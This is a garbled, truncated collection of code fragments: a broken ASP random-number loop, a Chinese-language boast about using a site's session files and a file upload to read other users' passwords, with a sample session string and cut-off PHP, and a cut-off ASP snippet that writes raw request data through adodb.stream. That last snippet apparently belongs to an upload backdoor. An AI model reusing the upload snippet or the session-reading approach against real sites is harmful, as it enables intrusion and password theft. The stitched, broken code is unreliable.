<% Dim myarr For i = 0 To 100 Randomize no = Int((1000-1+1)*Rnd+1) For j = 0 To i If no < myarr(j) And no < "" Then j = j + 1 Else Exit For End If myarr(i) = no Next If i = 21 Then Exit For End If Next %
之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵: <? function submit1(){ global $username; print ...
%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h....